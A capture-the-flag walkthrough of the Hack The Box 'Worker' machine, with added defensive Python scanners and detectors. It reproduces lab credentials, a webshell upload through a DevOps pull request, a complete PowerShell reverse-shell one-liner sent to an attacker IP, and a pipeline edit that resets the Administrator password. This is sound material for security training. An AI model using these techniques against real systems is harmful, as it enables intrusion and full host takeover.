Hack The Box - Worker Walkthrough without Metasploit

Worker: Windows box rated as Medium. We will face an SVN repository; with a bit of enumeration we will be able to get into the box, and then, using the DevOps Pipelines feature, we will gain Administrator access.


Last updated 4 years ago


Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-p- Scan all ports

nmap -sC -sV -p- 10.10.10.203

Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

But as always, when we encounter a web page, we run gobuster against it:

gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e

We didn't get much from this port. We also ran the command with bigger wordlists and with -x to add common Windows extensions such as asp and aspx, along with jsp, html, php, db, txt and xml, but had no luck either.

Svn

There's an SVN (Subversion) server running on port 3690.

Subversion is a VCS (Version Control System). It's "like" Git, with some differences:

Centralized instead of distributed

You must be connected to make commits

Each user can have just one copy of the trunk

Branching or merging is... well, quite time-consuming

Maybe that's why less than 10% of professional devs use it... and I guess those that use it do so because they are forced to. But it came out about 5 years before Git. In case someone wants to know a bit more about it, see the Apache Subversion link at the end of this page.

Checkout

We are going to checkout whatever repository we have there:

svn checkout svn://10.10.10.203

The most interesting file here is moved.txt:

We found a new Host to add to our /etc/hosts:

sudo nano /etc/hosts

Now we can try to access that URL:

Gathering info from SVN

So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:

svn info

We got the revision number, which is 5, and the name of a user: nathen.

SVN diff

The revision number is actually really important: it means we can compare this revision to the previous four and see if there are any differences:

svn diff -r <Revision Number>

The only change is the moved.txt that we saw before, let's try a different revision:

We can confirm the user nathen and... was there some password in plain text!? We have to take a look at Revision 2:
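Added example, not part of the original walkthrough: a small Python scanner for the lesson this section teaches, which is that a credential deleted in a later revision is still visible in the history. It parses the unified-diff text that svn diff prints and reports credential-looking lines in removed and added hunks, masking the value so the report itself does not become a second leak. The diff below is constructed to mimic such output; the file names and the regex rules are my assumptions, and the user and password values are the ones this walkthrough found.

```python
import re
from typing import Dict, List

# Patterns for credential-looking text. These are my assumptions, tuned for
# the two shapes seen in this kind of leak: "key = value" assignments and a
# "user / password" pair written into a comment.
SECRET_PATTERNS = [
    ("password-assignment",
     re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*['\"]?([^\s'\"$][^\s'\"]*)")),
    ("credential-pair",
     re.compile(r"(?i)\b(?:login|user(?:name)?)\b\s*[:=]?\s*([A-Za-z0-9._-]+)\s*/\s*([^\s'\"]+)")),
]

# Constructed sample of `svn diff -r 2:3` output (not the box's real files):
# a comment with credentials is removed from index.html and a hard-coded
# password in deploy.ps1 is replaced by an environment variable.
SAMPLE_DIFF = """\
Index: site/index.html
===================================================================
--- site/index.html\t(revision 2)
+++ site/index.html\t(revision 3)
@@ -1,4 +1,3 @@
 <html>
-<!-- login: nathen / wendel98 -->
 <body>Welcome</body>
 </html>
Index: deploy.ps1
===================================================================
--- deploy.ps1\t(revision 2)
+++ deploy.ps1\t(revision 3)
@@ -1,2 +1,2 @@
-$password = "Summer2020!"
+$password = $env:DEPLOY_PASSWORD
 Write-Host "deploying"
"""


def mask(secret: str) -> str:
    """Keep two characters so a finding can be correlated without reprinting the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_svn_diff(diff_text: str) -> List[Dict[str, str]]:
    """Walk svn diff output and report credential-looking content on changed lines."""
    findings: List[Dict[str, str]] = []
    current_file = "<unknown>"
    for raw in diff_text.splitlines():
        if raw.startswith("Index: "):
            current_file = raw[len("Index: "):].strip()
            continue
        # Skip unified-diff headers; real content lines start with '+', '-' or ' '.
        is_file_header = raw.startswith(("--- ", "+++ ")) and (
            "(revision" in raw or "(working copy)" in raw)
        if raw.startswith(("===", "@@")) or is_file_header:
            continue
        if not raw or raw[0] not in "+-":
            continue
        direction = "removed" if raw[0] == "-" else "added"
        body = raw[1:]
        for kind, pattern in SECRET_PATTERNS:
            m = pattern.search(body)
            if m:
                findings.append({
                    "file": current_file,
                    "direction": direction,
                    "kind": kind,
                    # the secret is the last capturing group of whichever pattern hit
                    "secret": mask(m.group(m.lastindex)),
                })
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_svn_diff(SAMPLE_DIFF):
        print(f"{f['file']}: {f['kind']} ({f['direction']}) -> {f['secret']}")
```

In practice you would feed it the output of `svn diff -r 1:HEAD` (or each consecutive revision pair) for the whole repository. A finding on a removed line means the secret was "cleaned up" but is still one `svn diff` away, so it has to be rotated, not just deleted; the same rules in a pre-commit hook stop the next one from landing at all.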

Repository

Now we have the user nathen and the password wendel98; let's try them on http://devops.worker.htb:

Clicking on SmartHotel360 will take us to the following page:

Here we can see the Repositories:

Exploitation

We are going to try to use the SVN repository to gain access to the box. In order to do so we must be able to make changes to master and upload a page that allows us to execute commands on the machine; since it's IIS 10.0, the page has to be either asp or aspx.

Foothold

We tried to commit directly on master but were unable to do so, so we are going to create a new branch, make some changes and then open a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

Click on our newly created branch:

Now upload a cmdasp.aspx (we have one ready to use in our Kali at /usr/share/webshells/aspx/cmdasp.aspx):

Click on Upload File(s), browse... and then select our cmdasp.aspx:

We also have to link a work item to the commit:

Now we just click on Commit and we'll be able to see the new commit id and the aspx file successfully uploaded to the branch.

We have to click on Create a pull request (we can see it on the commit id on the previous picture).

Create a New Pull Request of our evilbranch into master, selecting Nathalie (our user) as Reviewer:

If we take a long time to do this process, we may face this problem:

In order to avoid it we have to prepare what we want to do and do it as fast as possible. Now we have to repeat the process, and will have to use another branch name too.

Once we are back at this point, we have to approve the commit:

And Set auto-complete:

It will automatically complete the pull request.

If we go to the master branch now, we should be able to see our cmd page there:

If we look closely, we will see that next to master there is a subdomain name, spectral, so in order to access our new feature we need to add that to our /etc/hosts:

Now if we try to access our new feature:

It was deleted; it seems we really have to move fast in order to get access to this machine. So we are going to prepare all the steps now: the cmdasp.aspx, and the command we will use on it to gain access, which will be an encoded reverse.ps1 script.

We prepare an encoded reverse PowerShell script.

Reverse PowerShell script:

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

We encode it with PSEncoder.py:

python3 PSEncoder.py /path/to/our/reverse.ps1

Now, in the command shell we have on the page, we enter the encoded PowerShell script with the following arguments:

-Exec ByPass (execution policy bypass)

-Nol (-NoLogo)

-Enc (-EncodedCommand)

PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>

Have netcat listening on the indicated port and click on Execute:
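Added example from the defender's side; this is neither the walkthrough's code nor PSEncoder's. The -Enc payload is simply the script encoded as UTF-16LE and then base64, so a detection pipeline that reads process command lines (Sysmon event 1, or Windows 4688 with command-line auditing enabled) can reverse it and inspect the plaintext instead of the opaque blob. The code below extracts the argument of any -e… prefix that is not -ExecutionPolicy, decodes it, flags indicators such as a raw TCP client or Invoke-Expression, and separately notes an execution-policy bypass on the raw command line. The two command lines are constructed samples, and the indicator list is my assumption.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...). -ExecutionPolicy
# (-ex..., and -ep in practice) also starts with -e, so those are excluded.
ENC_ARG_RE = re.compile(r"(?i)(?:^|\s)-e(?![xp])[a-z]*\s+([A-Za-z0-9+/=]+)")
EXEC_BYPASS_RE = re.compile(r"(?i)(?:^|\s)-e(?:x[a-z]*|p)\s+bypass\b")

# What to look for in the decoded script. Assumed indicator list, not a complete one.
INDICATORS = [
    ("Net.Sockets.TCPClient", re.compile(r"(?i)Net\.Sockets\.TCPClient")),
    ("Invoke-Expression", re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b")),
    ("DownloadString", re.compile(r"(?i)DownloadString")),
    ("FromBase64String", re.compile(r"(?i)FromBase64String")),
]


def encode_command(script: str) -> str:
    """The transform -EncodedCommand expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str) -> Optional[str]:
    """Reverse encode_command; returns None on malformed input instead of raising."""
    try:
        data = base64.b64decode(b64, validate=True)
        if len(data) % 2:  # UTF-16 needs an even byte count
            return None
        return data.decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -e/-enc/-EncodedCommand, if present."""
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode an encoded PowerShell command line and flag suspicious content."""
    payload = extract_encoded(cmdline)
    decoded = decode_command(payload) if payload else None
    hits: List[str] = [name for name, rx in INDICATORS if decoded and rx.search(decoded)]
    return {
        "encoded": payload is not None,
        "decoded": decoded,
        "exec_bypass": bool(EXEC_BYPASS_RE.search(cmdline)),
        "indicators": hits,
    }


# Constructed sample command lines, as they would appear in the CommandLine field
# of Sysmon event 1 / Windows 4688. The first mirrors the invocation used above but
# carries only the connection line of the script; the second is benign.
SAMPLE_CMDLINES = [
    "PowerShell.exe -Exec ByPass -Nol -Enc "
    + encode_command("$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444)"),
    "powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze(line))
```

The encoder is included only so the sample can be built offline; the point for a SOC is the decoder, because a rule that fires on "-Enc" alone drowns in legitimate automation, whereas a rule on the decoded text (a TCP client plus Invoke-Expression, with -Exec ByPass on the same line) is specific enough to page someone.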

Internal Enumeration

First let's take a look at the user we are after:

We can see there is more than one volume on this box:

If we go into that volume and take a look around, we will see a passwd file under svnrepos/www/conf:

Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

evil-winrm -i <ip> -u <user> -p <password>

We are in as robisl and can grab our user flag. Now let's try to escalate privileges; in order to do that we are going to try to access the repository as robisl.

Privilege Escalation

Log in to devops.worker.htb as robisl:

In order to escalate privileges we are going to exploit the Pipelines feature:

Since the Repository is an Azure Repos Git:

Select our Repository:

Create a Starter pipeline:

The important thing to modify here is the script part:

We get rid of everything not needed and change the Administrator password with net user in the script:

Save and run:

We wait a bit while it does everything; we should end up with this:

Let's try evil-winrm again with our new creds.
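Added example, not from the walkthrough and not an Azure DevOps feature: a linter you could run as a policy check on pipeline YAML before a run is allowed, catching exactly the edit shown above, an inline script step that calls net user on a self-hosted agent. It extracts the commands of script, powershell, pwsh and bash steps with a minimal block-scalar reader (no PyYAML needed) and matches them against a small rule set. The pipeline text is constructed to resemble the starter pipeline after the edit, with a placeholder instead of a real password; the rule set is my assumption.

```python
import re
from typing import Dict, List

# Step shorthands in Azure Pipelines YAML whose value is an inline command.
STEP_RE = re.compile(r"^(\s*)-\s+(script|powershell|pwsh|bash):\s*(.*)$")
BLOCK_MARKERS = {"|", "|-", "|+", ">", ">-", ">+"}

# Assumed rule set: commands a build step has no business running on an agent.
RULES = [
    ("local-account-change",
     re.compile(r"(?i)\bnet\s+(?:user|localgroup)\b|\b(?:New|Set|Remove)-LocalUser\b|\bAdd-LocalGroupMember\b")),
    ("service-or-task-persistence",
     re.compile(r"(?i)\bsc(?:\.exe)?\s+(?:create|config)\b|\bschtasks(?:\.exe)?\s+/create\b")),
]

# Constructed pipeline text resembling the starter pipeline after the edit made
# above, with a placeholder instead of a real password. Not the box's real YAML.
SAMPLE_PIPELINE = """\
trigger:
- master

pool:
  name: Default  # constructed: a self-hosted agent, so scripts run as the agent account

steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    net user Administrator <NewPassword>
  displayName: 'Run a multi-line script'
"""


def extract_steps(yaml_text: str) -> List[Dict[str, object]]:
    """Pull the command text out of every script-like step (minimal YAML reading)."""
    lines = yaml_text.splitlines()
    steps: List[Dict[str, object]] = []
    i = 0
    while i < len(lines):
        m = STEP_RE.match(lines[i])
        if not m:
            i += 1
            continue
        dash_indent = len(m.group(1))
        key, value = m.group(2), m.group(3).strip()
        step_line = i + 1  # 1-based, for the report
        if value in BLOCK_MARKERS:
            # Block scalar: lines indented deeper than the step's own keys
            # (which sit two columns right of the dash) belong to the command.
            body: List[str] = []
            i += 1
            while i < len(lines):
                ln = lines[i]
                if ln.strip() == "":
                    body.append("")
                    i += 1
                    continue
                if len(ln) - len(ln.lstrip(" ")) <= dash_indent + 2:
                    break
                body.append(ln.strip())
                i += 1
            command = "\n".join(body).strip()
        else:
            command = value
            i += 1
        steps.append({"line": step_line, "key": key, "command": command})
    return steps


def find_risky_steps(yaml_text: str) -> List[Dict[str, object]]:
    """Match every step command against RULES and report the offending fragment."""
    report: List[Dict[str, object]] = []
    for step in extract_steps(yaml_text):
        for rule, rx in RULES:
            m = rx.search(str(step["command"]))
            if m:
                report.append({"line": step["line"], "key": step["key"],
                               "rule": rule, "match": m.group(0)})
    return report


if __name__ == "__main__":
    for r in find_risky_steps(SAMPLE_PIPELINE):
        print(f"line {r['line']}: {r['key']} step matches {r['rule']} ({r['match']!r})")
```

The lint is only the detective layer. What makes the edit above fatal on this box is that the agent runs with administrative rights and robisl can write and queue a pipeline without anyone else looking at it; the durable fixes are an agent service account with no local admin rights, a branch policy that requires a second reviewer for changes to the pipeline YAML, and restricting who may create and run pipelines at all.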

Pwnd

We can grab the root flag ;)

References

Apache Subversion
GitHub - 4st1nus/PSEncoder: A simple python script to encode powershell commands
GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting